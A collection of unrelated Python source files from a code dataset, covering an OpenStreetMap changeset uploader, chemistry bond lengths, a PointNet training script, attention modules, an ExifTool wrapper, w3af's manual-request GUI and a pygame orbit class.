auth_header = 'Basic {0}'.format(base64.b64encode('{0}:{1}'.format(
login, getpass.getpass('OSM Password: ')).encode('utf-8')).decode('utf-8'))
try:
result = api_request('user/details', headers={'Authorization': auth_header})
ok = len(result) > 0
except Exception as e:
logging.error(e)
if not ok:
logging.warning('You must have mistyped. Please try again.')
return auth_header
def obj_to_dict(obj):
"""Converts XML object to an easy to use dict."""
if obj is None:
return None
res = {}
res['type'] = obj.tag
res['id'] = obj.get('id')
res['version'] = int(obj.get('version'))
res['deleted'] = obj.get('visible') == 'false'
if obj.tag == 'node' and 'lon' in obj.keys() and 'lat' in obj.keys():
res['coords'] = (obj.get('lon'), obj.get('lat'))
res['tags'] = {tag.get('k'): tag.get('v') for tag in obj.findall('tag')}
if obj.tag == 'way':
res['refs'] = [x.get('ref') for x in obj.findall('nd')]
elif obj.tag == 'relation':
res['refs'] = [(x.get('type'), x.get('ref'), x.get('role')) for x in obj.findall('member')]
return res
def dict_to_obj(obj):
"""Converts object dict back to an XML element."""
if obj is None:
return None
res = etree.Element(obj['type'], {'id': str(obj['id']), 'version': str(obj['version'])})
res.set('visible', 'false' if obj['deleted'] else 'true')
if 'coords' in obj:
res.set('lon', obj['coords'][0])
res.set('lat', obj['coords'][1])
if 'tags' in obj:
for k, v in obj['tags'].items():
res.append(etree.Element('tag', {'k': k, 'v': v}))
if not obj['deleted']:
if obj['type'] == 'way':
for nd in obj['refs']:
res.append(etree.Element('nd', {'ref': nd}))
elif obj['type'] == 'relation':
for member in obj['refs']:
res.append(etree.Element('member', {'type': member[0],
'ref': member[1],
'role': member[2]}))
return res
def changes_to_osc(changes, changeset_id=None):
# Set explicit actions for each changed object
for c in changes:
if 'version' not in c or c['version'] <= 0:
c['action'] = 'create'
elif 'deleted' in c and c['deleted']:
c['action'] = 'delete'
else:
c['action'] = 'modify'
# Sort changes, so created nodes are first, and deleted are last
def change_as_key(ch):
act = ['create', 'modify', 'delete'].index(ch['action'])
typ = ['node', 'way', 'relation'].index(ch['type'])
if act == 2:
typ = 2 - typ
return '{0}{1}{2}'.format(act, typ, ch['id'])
changes.sort(key=change_as_key)
osc = etree.Element('osmChange', {'version': '0.6'})
for c in changes:
act = etree.SubElement(osc, c['action'])
el = dict_to_obj(c)
if changeset_id:
el.set('changeset', str(changeset_id))
act.append(el)
try:
return etree.tostring(osc, pretty_print=True, encoding='utf-8', xml_declaration=True)
except TypeError:
# xml.etree.ElementTree does not support pretty printing
return etree.tostring(osc, encoding='utf-8')
def changeset_xml(changeset_tags):
create_xml = etree.Element('osm')
ch = etree.SubElement(create_xml, 'changeset')
for k, v in changeset_tags.items():
ch.append(etree.Element('tag', {'k': k, 'v': v}))
return etree.tostring(create_xml)
def upload_changes(changes, changeset_tags):
"""Uploads a list of changes as tuples (action, obj_dict)."""
if not changes:
logging.info('No changes to upload.')
return False
# Now we need the OSM credentials
auth_header = read_auth()
headers = {'Authorization': auth_header}
try:
changeset_id = int(api_request(
'changeset/create', 'PUT', raw_result=True,
data=changeset_xml(changeset_tags), headers=headers,
))
logging.info('Writing to changeset %s', changeset_id)
except Exception as e:
logging.exception(e)
logging.error('Failed to create changeset: %s', e)
return False
osc = changes_to_osc(changes, changeset_id)
ok = True
try:
api_request(
'changeset/{}/upload'.format(changeset_id), 'POST',
data=osc, headers=headers
)
except HTTPError as e:
logging.error('Server rejected the changeset with code %s: %s', e.code, e.message)
if e.code == 412:
# Find the culprit for a failed precondition
m = re.search(r'Node (\d+) is still used by (way|relation)s ([0-9,]+)', e.message)
if m:
# Find changeset for the first way or relation that started using that node
pass
else:
m = re.search(r'(Way|The relation) (\d+) is .+ relations? ([0-9,]+)', e.message)
if m:
# Find changeset for the first relation that started using that way or relation
pass
else:
m = re.search(r'Way (\d+) requires .+ id in \(([0-9,]+\)', e.message)
if m:
# Find changeset that deleted at least the first node in the list
pass
else:
m = re.search(r'Relation with id (\d+) .+ due to (\w+) with id (\d+)',
e.message)
if m:
# Find changeset that added member to that relation
pass
except Exception as e:
ok = False
logging.error('Failed to upload changetset contents: %s', e)
# Not returning, since we need to close the changeset
try:
api_request('changeset/{}/close'.format(changeset_id), 'PUT', headers=headers)
except Exception as e:
logging.warning(
'Failed to close changeset (it will close automatically in an hour): %s', e)
return ok
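# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original script): builds a single new
# node as a change dictionary and serialises it to osmChange XML without
# touching the API. The id, coordinates and tag below are made-up values.
def _example_build_osc():
    new_node = {
        'type': 'node', 'id': '-1', 'version': 0, 'deleted': False,
        'coords': ('13.3777', '52.5163'),
        'tags': {'amenity': 'bench'},
    }
    # version <= 0 makes changes_to_osc() mark this object as a "create"
    return changes_to_osc([new_node], changeset_id=1)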
| StarcoderdataPython |
1766596 | """ Dictionary of standard bond lengths
"""
from phydat.phycon import ANG2BOHR
# Dictionary of A-B single bond lengths
LEN_DCT = {
('H', 'H'): 0.74 * ANG2BOHR,
('H', 'C'): 1.09 * ANG2BOHR,
('H', 'N'): 1.01 * ANG2BOHR,
('H', 'O'): 0.95 * ANG2BOHR,
('H', 'Cl'): 1.275 * ANG2BOHR,
('C', 'C'): 1.54 * ANG2BOHR,
('C', 'N'): 1.47 * ANG2BOHR,
('C', 'O'): 1.43 * ANG2BOHR,
('N', 'N'): 1.45 * ANG2BOHR,
('N', 'O'): 1.45 * ANG2BOHR,
('O', 'O'): 1.40 * ANG2BOHR,
('C', 'Cl'): 1.74 * ANG2BOHR,
('Cl', 'Cl'): 2.0 * ANG2BOHR,
}
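# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original table): LEN_DCT stores each
# element pair only once, so a small helper that tries both key orders can be
# convenient. The helper name and the C-H query are illustrative assumptions.
def _example_bond_length(symb1, symb2):
    """ Return the tabulated single-bond length in Bohr, or None if missing.
    """
    return LEN_DCT.get((symb1, symb2), LEN_DCT.get((symb2, symb1)))
# _example_bond_length('C', 'H') resolves to the ('H', 'C') entry above.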
| StarcoderdataPython |
1754077 | from django.core.exceptions import ValidationError
class HttpError(Exception):
pass
class TrustChainHttpError(HttpError):
pass
class UnknownKid(Exception):
pass
class MissingJwksClaim(ValidationError):
pass
class MissingAuthorityHintsClaim(ValidationError):
pass
class NotDescendant(ValidationError):
pass
class TrustAnchorNeeded(ValidationError):
pass
class MetadataDiscoveryException(ValidationError):
pass
class MissingTrustMark(ValidationError):
pass
class InvalidRequiredTrustMark(ValidationError):
pass
class InvalidTrustchain(ValidationError):
pass
class InvalidEntityConfiguration(ValidationError):
pass
| StarcoderdataPython |
188043 | <reponame>yiming107/Pointnet_Pointnet2_pytorch<filename>train_cls.py
"""
Author: Benny
Date: Nov 2019
Modified by: Yiming
Main changes: compatible to train other dataset
"""
from data_utils.ModelNetDataLoader import ModelNetDataLoader
from data_utils.ReplicaDataLoader import ReplicaDataLoader
import argparse
import numpy as np
import os
import torch
import datetime
import logging
from pathlib import Path
from tqdm import tqdm
import sys
import provider
import importlib
import shutil
from torch.utils.tensorboard import SummaryWriter
import torch.nn as nn
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = BASE_DIR
sys.path.append(os.path.join(ROOT_DIR, 'models'))
def parse_args():
'''PARAMETERS'''
parser = argparse.ArgumentParser('PointNet')
parser.add_argument('--batch_size', type=int, default=16, help='batch size in training [default: 24]')
parser.add_argument('--dataset_name', type=str, default="replica", help='dataset name to use [default: modelnet40]') #modelnet40_normal_resampled
parser.add_argument('--model', default='pointnet2_cls_msg', help='model name [default: pointnet_cls]')
parser.add_argument('--epoch', default=1000, type=int, help='number of epoch in training [default: 200]')
parser.add_argument('--learning_rate', default=0.001, type=float, help='learning rate in training [default: 0.001]')
parser.add_argument('--gpu', type=str, default='0', help='specify gpu device [default: 0]')
parser.add_argument('--num_point', type=int, default=1024, help='Point Number [default: 1024]')
parser.add_argument('--optimizer', type=str, default='Adam', help='optimizer for training [default: Adam]')
parser.add_argument('--log_dir', type=str, default='pointnet2_cls_msg', help='experiment root')
parser.add_argument('--decay_rate', type=float, default=1e-4, help='decay rate [default: 1e-4]')
parser.add_argument('--normal', action='store_true', default=False, help='Whether to use normal information [default: False]')
return parser.parse_args()
def test(model, loader, device, num_class):
mean_correct = []
class_acc = np.zeros((num_class, 3))
for j, data in tqdm(enumerate(loader), total=len(loader)):
points, target = data
target = target[:, 0]
points = points.transpose(2, 1)
points, target = points.to(device), target.to(device)
classifier = model.eval()
pred, _ = classifier(points)
pred_choice = pred.data.max(1)[1]
for cat in np.unique(target.cpu()):
classacc = pred_choice[target==cat].eq(target[target==cat].long().data).cpu().sum()
class_acc[cat,0]+= classacc.item()/float(points[target==cat].size()[0])
class_acc[cat,1]+=1
correct = pred_choice.eq(target.long().data).cpu().sum()
mean_correct.append(correct.item()/float(points.size()[0]))
class_acc[:,2] = class_acc[:,0]/ class_acc[:,1]
class_acc = np.mean(class_acc[:,2])
instance_acc = np.mean(mean_correct)
return instance_acc, class_acc
def main(args):
def log_string(str):
logger.info(str)
print(str)
'''HYPER PARAMETER'''
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu
'''CREATE DIR'''
timestr = str(datetime.datetime.now().strftime('%Y-%m-%d_%H-%M'))
experiment_dir = Path('./log/')
experiment_dir.mkdir(exist_ok=True)
dataset_name = args.dataset_name
experiment_dir = experiment_dir.joinpath('classification_{}'.format(dataset_name))
experiment_dir.mkdir(exist_ok=True)
if args.log_dir is None:
experiment_dir = experiment_dir.joinpath(timestr)
else:
experiment_dir = experiment_dir.joinpath(args.log_dir)
experiment_dir.mkdir(exist_ok=True)
checkpoints_dir = experiment_dir.joinpath('checkpoints/')
checkpoints_dir.mkdir(exist_ok=True)
log_dir = experiment_dir.joinpath('logs/')
log_dir.mkdir(exist_ok=True)
'''LOG'''
args = parse_args()
logger = logging.getLogger("Model")
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
file_handler = logging.FileHandler('%s/%s.txt' % (log_dir, args.model))
file_handler.setLevel(logging.INFO)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
log_string('PARAMETER ...')
log_string(args)
'''TENSORBOARD LOG'''
writer = SummaryWriter()
'''DATA LOADING'''
log_string('Load dataset ...')
DATA_PATH = os.path.join(ROOT_DIR, 'data', dataset_name)
print("loading dataset from {}".format(dataset_name))
if 'modelnet' in dataset_name:
TRAIN_DATASET = ModelNetDataLoader(DATA_PATH, split='train',
normal_channel=args.normal)
TEST_DATASET = ModelNetDataLoader(DATA_PATH, split='test',
normal_channel=args.normal)
num_class = 40
else:
print(DATA_PATH)
TRAIN_DATASET = ReplicaDataLoader(DATA_PATH, split='train', uniform=True, normal_channel=False, rot_transform=True)
TEST_DATASET = ReplicaDataLoader(DATA_PATH, split='test', uniform=True, normal_channel=False, rot_transform=False)
num_class = 31
trainDataLoader = torch.utils.data.DataLoader(TRAIN_DATASET, batch_size=args.batch_size, shuffle=True, num_workers=6)
testDataLoader = torch.utils.data.DataLoader(TEST_DATASET, batch_size=args.batch_size, shuffle=False, num_workers=6)
'''MODEL LOADING'''
print("Number of classes are {:d}".format(num_class))
MODEL = importlib.import_module(args.model)
shutil.copy('./models/%s.py' % args.model, str(experiment_dir))
shutil.copy('./models/pointnet_util.py', str(experiment_dir))
print("Obtain GPU device ")
train_GPU = True
device = torch.device("cuda" if (torch.cuda.is_available() and train_GPU) else "cpu")
print(device)
print("Load the network to the device ")
classifier = MODEL.get_model(num_class, normal_channel=args.normal).to(device)
print("Load the loss to the device ")
criterion = MODEL.get_loss().to(device)
if os.path.exists((str(experiment_dir) + '/checkpoints/best_model.pth')):
checkpoint = torch.load(str(experiment_dir) + '/checkpoints/best_model.pth')
start_epoch = checkpoint['epoch']
classifier.load_state_dict(checkpoint['model_state_dict'])
# strict set to false to allow using the model trained with modelnet
else:
start_epoch = 0
if dataset_name == 'replica':
log_string('Use pretrain model of Model net')
# double check again if there is pretrained modelnet model
checkpoint = torch.load(str(experiment_dir).replace("replica", 'modelnet40_normal_resampled')+'/checkpoints/best_model.pth')
classifier = MODEL.get_model(40, normal_channel=args.normal).to(device)
classifier.load_state_dict(checkpoint['model_state_dict'])
classifier.fc3 = nn.Linear(256, num_class).to(device)
print(classifier)
else:
log_string('No existing model, starting training from scratch...')
if args.optimizer == 'Adam':
print("Using Adam opimizer ")
optimizer = torch.optim.Adam(
classifier.parameters(),
lr=args.learning_rate,
betas=(0.9, 0.999),
eps=1e-08,
weight_decay=args.decay_rate
)
else:
optimizer = torch.optim.SGD(classifier.parameters(), lr=0.01, momentum=0.9)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.7)
global_epoch = 0
global_step = 0
best_instance_acc = 0.0
best_class_acc = 0.0
mean_correct = []
'''TRANING'''
logger.info('Start training...')
for epoch in range(start_epoch, args.epoch):
loss_array = np.zeros((len(trainDataLoader),1))
log_string('Epoch %d (%d/%s):' % (global_epoch + 1, epoch + 1, args.epoch))
classifier.train() # setting the model to train mode
print("Clear GPU cache ...")
torch.cuda.empty_cache()
scheduler.step()
for batch_id, data in tqdm(enumerate(trainDataLoader, 0), total=len(trainDataLoader), smoothing=0.9):
points, target = data
points = points.data.numpy()
points = provider.random_point_dropout(points)
points[:, :, 0:3] = provider.random_scale_point_cloud(points[:, :, 0:3])
points[:, :, 0:3] = provider.shift_point_cloud(points[:, :, 0:3])
points = torch.Tensor(points)
target = target[:, 0]
points = points.transpose(2, 1)
points, target = points.to(device), target.to(device)
optimizer.zero_grad()
pred, trans_feat = classifier(points) ### This is the part of the runtime error:
loss = criterion(pred, target.long(), trans_feat)
loss_array[batch_id] = loss.cpu().detach().numpy()
pred_choice = pred.data.max(1)[1]
correct = pred_choice.eq(target.long().data).cpu().sum()
mean_correct.append(correct.item() / float(points.size()[0]))
loss.backward()
optimizer.step()
global_step += 1
train_instance_acc = np.mean(mean_correct)
log_string('Train Instance Accuracy: %f' % train_instance_acc)
avg_loss = np.mean(loss_array[:])
writer.add_scalar("Loss/train", avg_loss, epoch)
## This is for validation
with torch.no_grad():
instance_acc, class_acc = test(classifier.eval(), testDataLoader, device, num_class)
writer.add_scalar("ClassAccuracy/test", class_acc, epoch)
writer.add_scalar("InstanceAccuracy/test", instance_acc, epoch)
if (instance_acc >= best_instance_acc):
best_instance_acc = instance_acc
best_epoch = epoch + 1
if (class_acc >= best_class_acc):
best_class_acc = class_acc
log_string('Test Instance Accuracy: %f, Class Accuracy: %f'% (instance_acc, class_acc))
log_string('Best Instance Accuracy: %f, Class Accuracy: %f'% (best_instance_acc, best_class_acc))
if (instance_acc >= best_instance_acc):
logger.info('Save model...')
savepath = str(checkpoints_dir) + '/best_model.pth'.format(epoch)
log_string('Saving at %s'% savepath)
state = {
'epoch': best_epoch,
'instance_acc': instance_acc,
'class_acc': class_acc,
'model_state_dict': classifier.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
}
torch.save(state, savepath)
global_epoch += 1
logger.info('End of training...')
writer.flush()
writer.close()
if __name__ == '__main__':
args = parse_args()
main(args)
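# Hedged command-line sketch (the dataset name, model and options below are
# assumed example values, not settings required by this script):
#   python train_cls.py --dataset_name replica --model pointnet2_cls_msg \
#       --batch_size 16 --epoch 200 --gpu 0 --log_dir pointnet2_cls_msg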
| StarcoderdataPython |
3223378 | <reponame>Dou-Yu-xuan/deep-learning-visal
import torch
import torch.nn as nn
import torch.nn.functional as F
class _PositionAttentionModule(nn.Module):
""" Position attention module"""
def __init__(self, in_channels, **kwargs):
super(_PositionAttentionModule, self).__init__()
self.conv_b = nn.Conv2d(in_channels, in_channels // 8, 1)
self.conv_c = nn.Conv2d(in_channels, in_channels // 8, 1)
self.conv_d = nn.Conv2d(in_channels, in_channels, 1)
self.alpha = nn.Parameter(torch.zeros(1))
self.softmax = nn.Softmax(dim=-1)
def forward(self, x):
batch_size, _, height, width = x.size()
feat_b = self.conv_b(x).view(batch_size, -1, height * width).permute(0, 2, 1)
feat_c = self.conv_c(x).view(batch_size, -1, height * width)
attention_s = self.softmax(torch.bmm(feat_b, feat_c))
feat_d = self.conv_d(x).view(batch_size, -1, height * width)
feat_e = torch.bmm(feat_d, attention_s.permute(0, 2, 1)).view(batch_size, -1, height, width)
out = self.alpha * feat_e + x
return out
class _ChannelAttentionModule(nn.Module):
"""Channel attention module"""
def __init__(self, **kwargs):
super(_ChannelAttentionModule, self).__init__()
self.beta = nn.Parameter(torch.zeros(1))
self.softmax = nn.Softmax(dim=-1)
def forward(self, x):
batch_size, _, height, width = x.size()
feat_a = x.view(batch_size, -1, height * width)
feat_a_transpose = x.view(batch_size, -1, height * width).permute(0, 2, 1)
attention = torch.bmm(feat_a, feat_a_transpose)
attention_new = torch.max(attention, dim=-1, keepdim=True)[0].expand_as(attention) - attention
attention = self.softmax(attention_new)
feat_e = torch.bmm(attention, feat_a).view(batch_size, -1, height, width)
out = self.beta * feat_e + x
return out
class _DAHead(nn.Module):
def __init__(self, in_channels, nclass, aux=True, norm_layer=nn.BatchNorm2d, norm_kwargs=None, **kwargs):
super(_DAHead, self).__init__()
self.aux = aux
inter_channels = in_channels // 4
self.conv_p1 = nn.Sequential(
nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),
norm_layer(inter_channels, **({} if norm_kwargs is None else norm_kwargs)),
nn.ReLU(True)
)
self.conv_c1 = nn.Sequential(
nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),
norm_layer(inter_channels, **({} if norm_kwargs is None else norm_kwargs)),
nn.ReLU(True)
)
self.pam = _PositionAttentionModule(inter_channels, **kwargs)
self.cam = _ChannelAttentionModule(**kwargs)
self.conv_p2 = nn.Sequential(
nn.Conv2d(inter_channels, inter_channels, 3, padding=1, bias=False),
norm_layer(inter_channels, **({} if norm_kwargs is None else norm_kwargs)),
nn.ReLU(True)
)
self.conv_c2 = nn.Sequential(
nn.Conv2d(inter_channels, inter_channels, 3, padding=1, bias=False),
norm_layer(inter_channels, **({} if norm_kwargs is None else norm_kwargs)),
nn.ReLU(True)
)
self.out = nn.Sequential(
nn.Dropout(0.1),
nn.Conv2d(inter_channels, nclass, 1)
)
if aux:
self.conv_p3 = nn.Sequential(
nn.Dropout(0.1),
nn.Conv2d(inter_channels, nclass, 1)
)
self.conv_c3 = nn.Sequential(
nn.Dropout(0.1),
nn.Conv2d(inter_channels, nclass, 1)
)
def forward(self, x):
feat_p = self.conv_p1(x)
feat_p = self.pam(feat_p)
feat_p = self.conv_p2(feat_p)
feat_c = self.conv_c1(x)
feat_c = self.cam(feat_c)
feat_c = self.conv_c2(feat_c)
feat_fusion = feat_p + feat_c
outputs = []
fusion_out = self.out(feat_fusion)
outputs.append(fusion_out)
if self.aux:
p_out = self.conv_p3(feat_p)
c_out = self.conv_c3(feat_c)
outputs.append(p_out)
outputs.append(c_out)
return tuple(outputs)
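# ---------------------------------------------------------------------------
# Hedged smoke-test sketch (not part of the original file): pushes a random
# feature map through _DAHead to check output shapes. in_channels=2048 and
# nclass=19 are assumed example values, not settings required by this module.
if __name__ == '__main__':
    head = _DAHead(in_channels=2048, nclass=19)
    feats = torch.randn(2, 2048, 32, 32)
    fused, pam_out, cam_out = head(feats)
    print(fused.shape, pam_out.shape, cam_out.shape)  # each should be (2, 19, 32, 32)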
| StarcoderdataPython |
180941 | <gh_stars>1-10
from django.contrib.syndication.views import Feed
from django.template.defaultfilters import truncatewords_html
from django.utils.safestring import mark_safe
from django.utils.html import strip_tags
from .models import Post
class LatestPostsFeed(Feed):
title = 'Bloggable'
link = ''
description = 'Latest posts of Bloggable'
def items(self):
return Post.published.all()[:10]
def item_title(self, item):
return item.title
def item_description(self, item):
return truncatewords_html(item.content,60)
| StarcoderdataPython |
3389632 | <gh_stars>100-1000
from __future__ import unicode_literals
from tests.utils import ConverterTestCase
class StructTestCase(ConverterTestCase):
def test_typedef_primitives(self):
self.assertGeneratedOutput(
"""
typedef unsigned foo1;
typedef unsigned short foo2;
typedef unsigned int foo3;
typedef unsigned long foo4;
typedef unsigned long long foo5;
typedef signed foo6;
typedef short foo7;
typedef int foo8;
typedef long foo9;
typedef long long foo10;
typedef float bar1;
typedef double bar2;
""",
"""
foo1 = int
foo2 = int
foo3 = int
foo4 = int
foo5 = int
foo6 = int
foo7 = int
foo8 = int
foo9 = int
foo10 = int
bar1 = float
bar2 = float
"""
)
def test_typedef_commutative(self):
self.assertGeneratedOutput(
"""
typedef int foo1;
typedef foo1 foo2;
""",
"""
foo1 = int
foo2 = foo1
"""
)
def test_typedef_struct(self):
self.assertGeneratedOutput(
"""
typedef struct {
float x;
float y;
} Foo;
""",
"""
class Foo:
def __init__(self, x=None, y=None):
self.x = x
self.y = y
"""
)
def test_typedef_named_struct(self):
self.assertGeneratedOutput(
"""
typedef struct Foo {
float x;
float y;
} Bar;
""",
"""
class Foo:
def __init__(self, x=None, y=None):
self.x = x
self.y = y
Bar = Foo
"""
)
| StarcoderdataPython |
1684409 | import json
import os
import subprocess
import logging
logger = logging.getLogger('debug')
class ExifTool:
"""
ExifTool class that is used to get song metadata
"""
sentinel = b"{ready}"
def __init__(self, executable="exiftool"):
self.executable = executable
self.running = False
def start(self):
with open('errors.txt', 'a') as err:
self._process = subprocess.Popen([self.executable, "-stay_open", "True",
"-@", "-", "-common_args", "-n",
"-charset", "filename=UTF-8", "-b"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=err)
self.running = True
def terminate(self):
if not self.running:
return
self._process.stdin.write(b"-stay_open\nFalse\n")
self._process.stdin.flush()
self._process.communicate()
del self._process
self.running = False
@staticmethod
def get_filenames(*files):
filenames = []
for file in files:
if isinstance(file, bytes):
filenames.append(file)
elif isinstance(file, str):
filenames.append(file.encode('utf-8'))
else:
raise TypeError('Filename must be bytes or str')
return b"\n".join(filenames)
def execute(self, *args):
if not self.running:
print('[ERROR] ExifTool is not running')
return
args = b"\n".join(args + (b"-execute\n",))
self._process.stdin.write(args)
self._process.stdin.flush()
output = b""
fd = self._process.stdout.fileno()
while not output.strip().endswith(self.sentinel):
output += os.read(fd, 4096)
return output.strip()[:-len(self.sentinel)]
def get_cover_art(self, *files):
args = (b"-Picture", b"-j")
pics = self.execute(*args, self.get_filenames(*files)).decode('utf-8')
try:
return json.loads(pics)
except Exception as e:
logger.info('Could not get metadata. {}\n{}\n{}'.format(', '.join(files), pics, e))
return {}
def get_metadata(self, *filenames):
args = (b"-j",)
js = self.execute(*args, self.get_filenames(*filenames)).decode('utf-8')
if js is not None:
try:
return json.loads(js)
except Exception as e:
logger.info('Could not get metadata. {}\n{}\n{}'.format(', '.join(filenames), js, e))
return {} | StarcoderdataPython |
1637331 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import unicodedata
import epitran
import argparse
def main(code):
epi = epitran.Epitran(code)
    for line in sys.stdin:  # transliterate standard input line by line
line = line.decode('utf-8')
line = unicodedata.normalize('NFD', line.lower())
line = epi.transliterate(line)
line = line.encode('utf-8')
sys.stdout.write(line)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=u'Coverts text from STDIN (in the language specified),' +
'into Unicode IPA and emits it to STDOUT.')
parser.add_argument('code', help=u'ISO 639-3 code for conversion language')
args = parser.parse_args()
main(args.code)
| StarcoderdataPython |
180709 | <filename>packages/w3af/w3af/core/ui/gui/tools/manual_requests.py
"""
manual_requests.py
Copyright 2007 <NAME>
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import gtk
import gobject
import threading
from w3af.core.ui.gui import helpers, entries
from w3af.core.ui.gui.reqResViewer import ReqResViewer
from w3af.core.ui.gui.tools.helpers.threaded_impact import ThreadedURLImpact
from w3af.core.controllers.exceptions import (BaseFrameworkException,
ScanMustStopException,
HTTPRequestException,
ProxyException)
MANUAL_REQUEST_EXAMPLE = """\
GET http://w3af.org/ HTTP/1.1
Host: w3af.org
User-Agent: Firefox
"""
class ManualRequests(entries.RememberingWindow):
"""Infrastructure to generate manual HTTP requests.
:author: <NAME> <facundobatista =at= taniquetil.com.ar>
"""
def __init__(self, w3af, initial_request=None):
super(ManualRequests, self).__init__(w3af, "manualreq",
"w3af - Manual Requests",
"Manual_Requests")
self.w3af = w3af
#
# Toolbar
#
self.send_but = entries.SemiStockButton(_("Send"), gtk.STOCK_MEDIA_PLAY,
_("Send HTTP request"))
self.send_but.connect("clicked", self._send)
self.send_but.show()
# Fix content length checkbox
self._fix_content_len_cb = gtk.CheckButton('Fix content length header')
self._fix_content_len_cb.set_active(True)
self._fix_content_len_cb.show()
# request-response viewer
self.reqresp = ReqResViewer(w3af, [self.send_but.set_sensitive],
withManual=False, editableRequest=True)
self.reqresp.response.set_sensitive(False)
self.vbox.pack_start(self.reqresp, True, True)
self.vbox.pack_start(self._fix_content_len_cb, False, False)
self.vbox.pack_start(self.send_but, False, False)
# Add a default request
if initial_request is None:
self.reqresp.request.show_raw(MANUAL_REQUEST_EXAMPLE, '')
else:
initial_up, initial_dn = initial_request
self.reqresp.request.show_raw(initial_up, initial_dn)
# Show all!
self.show()
def _send(self, widg):
"""Actually sends the manual requests.
:param widg: who sent the signal.
"""
tsup, tlow = self.reqresp.request.get_both_texts()
busy = gtk.gdk.Window(self.window, gtk.gdk.screen_width(),
gtk.gdk.screen_height(), gtk.gdk.WINDOW_CHILD,
0, gtk.gdk.INPUT_ONLY)
busy.set_cursor(gtk.gdk.Cursor(gtk.gdk.WATCH))
busy.show()
while gtk.events_pending():
gtk.main_iteration()
# Get the fix content length value
fix_content_len = self._fix_content_len_cb.get_active()
# threading game
event = threading.Event()
impact = ThreadedURLImpact(self.w3af, tsup, tlow, event,
fix_content_len)
def impact_done():
if not event.isSet():
return True
busy.destroy()
if impact.ok:
self.reqresp.response.set_sensitive(True)
self.reqresp.response.show_object(impact.httpResp)
self.reqresp.nb.next_page()
elif hasattr(impact, 'exception'):
known_exceptions = (BaseFrameworkException,
ScanMustStopException,
HTTPRequestException,
ProxyException)
if not isinstance(impact.exception, known_exceptions):
raise impact.exception
else:
msg = "Stopped sending requests because of the following"\
" unexpected error:\n\n%s"
self.reqresp.response.clear_panes()
self.reqresp.response.set_sensitive(False)
gtk.gdk.threads_enter()
helpers.FriendlyExceptionDlg(msg % impact.exception)
gtk.gdk.threads_leave()
else:
# This is a very strange case, because impact.ok == False
# but impact.exception does not exist!
self.reqresp.response.clear_panes()
self.reqresp.response.set_sensitive(False)
gtk.gdk.threads_enter()
helpers.FriendlyExceptionDlg('Errors occurred while sending'
' the HTTP request.')
gtk.gdk.threads_leave()
return False
impact.start()
gobject.timeout_add(200, impact_done) | StarcoderdataPython |
1799414 | <reponame>super-goose/orbit
import pygame
import math
class Planet:
def __init__(self, surface, color, position, radius, center):
self.radius = radius
self.surface = surface
self.color = color
self.setPosition(position)
self.center = center
self.setOrbitOffset(0)
self.setOrbitPeriod(1)
self.setOrbitRadius(0)
self.year = 0
self.mass = 0
self.velocity = 0
self.angle = 0
self.name = ''
def drawPlanet(self):
x = int(self.position[0])
y = int(self.position[1])
pygame.draw.circle(self.surface, self.color, (x, y), self.radius)
def getRadius(self): return self.radius
def setPosition(self, newPos):
self.position = newPos
return self
def getPosition(self): return self.position
def setVelocity(self, vel):
self.velocity = vel
return self
def getVelocity(self): return self.velocity
def setAngle(self, angle):
self.angle = angle
return self
def getAngle(self): return self.angle
def setName(self, name):
self.name = name
return self
def getName(self): return self.name
def setGravity(self, gravity):
self.gravity = gravity
return self
def getGravity(self): return self.gravity
def setOrbitRadius(self, radius):
self.orbitRadius = radius
return self
def getOrbitRadius(self): return self.orbitRadius
def setOrbitOffset(self, offset):
self.orbitOffset = offset
return self
def getOrbitOffset(self): return self.orbitOffset
def setOrbitPeriod(self, period):
self.orbitPeriod = period
return self
def getOrbitPeriod(self): return self.orbitPeriod
def advancePosition(self, sun):
x, y = self.position
# get new point with no gravity
v = self.velocity
angle = self.angle
vx = v * math.sin(angle)
vy = v * math.cos(angle)
# get the pull fromt he sun
gravitaionalConstant = 14 # this is the number that made it work well
# i don't know why this number and not another
sunX, sunY = sun.getPosition()
sunX -= x
sunY -= y
d = math.sqrt(sunX**2 + sunY**2)
g = sun.getGravity() * gravitaionalConstant / (d ** 2)
ax = (g * sunX) / d
ay = (g * sunY) / d
# add these vectors together
dx = vx + ax
dy = vy + ay
newV = math.sqrt(dx**2 + dy**2)
# using law of cosines to get the angle
# by getting the cosine first, then using arccos to find the angle
ac = (g**2 - v**2 - newV**2)/(-2 * v * newV)
A = math.acos(ac)
#update attributes
self.angle += A
self.velocity = newV
x += newV * math.sin(self.angle)
y += newV * math.cos(self.angle)
self.setPosition((x, y))
return self
def distanceFrom(self, pos):
x1 = self.position[0]
y1 = self.position[1]
x2 = pos[0]
y2 = pos[1]
return math.sqrt((x1 - x2)**2 + (y1 - y2)**2)
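# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original class): one way two Planet
# objects might be wired together for a simple two-body integration. The
# surface size, colours, gravity and starting velocity are assumed values;
# the speed of 8.4 gives a roughly circular orbit for these numbers.
def _example_orbit_step(frames=60):
    surface = pygame.Surface((800, 600))      # off-screen surface, no window required
    center = (400, 300)
    sun = Planet(surface, (255, 255, 0), center, 20, center)
    sun.setGravity(1000)                      # assumed "mass" term used by advancePosition
    moon = Planet(surface, (0, 0, 255), (400, 100), 5, center)
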